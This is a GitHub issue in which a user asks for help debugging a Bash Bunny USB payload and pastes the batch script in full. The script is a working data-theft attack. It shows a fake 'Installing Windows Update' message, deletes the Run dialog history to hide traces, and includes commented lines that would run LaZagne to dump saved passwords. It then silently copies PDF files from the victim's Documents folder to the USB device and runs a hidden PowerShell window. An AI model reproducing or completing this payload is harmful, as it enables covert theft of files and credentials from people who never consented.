hak5/bashbunny-payloads

Problem with the usb_exfiltrator.

mosesraona opened this issue · 0 comments

mosesraona commented

Hi everyone, first post ever here.

I recently got a Bash Bunny to test some Things out on my pc.
I just can't get it to work.

The perfect Scenario would be, that after pluging the BashBunny in, it copies all the .pdf files from all drives.

This is what I have atm:
@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
REM setlocal
REM cd /d %dp0
REM %dp0\laZagne.exe all > "%dp0....\loot\USB_Exfiltration%COMPUTERNAME%_%date:-4,4%%date:-10,2%%date:7,2%_%time:-11,2%%time:-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%dp0....\loot\USB_Exfiltration%COMPUTERNAME%_%date:-4,4%%date:-10,2%%date:7,2%_%time:-11,2%%time:-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents*.pdf %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@EXIT

This should take all the files from the Personal Documents Folder, but after a quick PowerShell Pop up Nothing happens.

Thx in Advance for the help.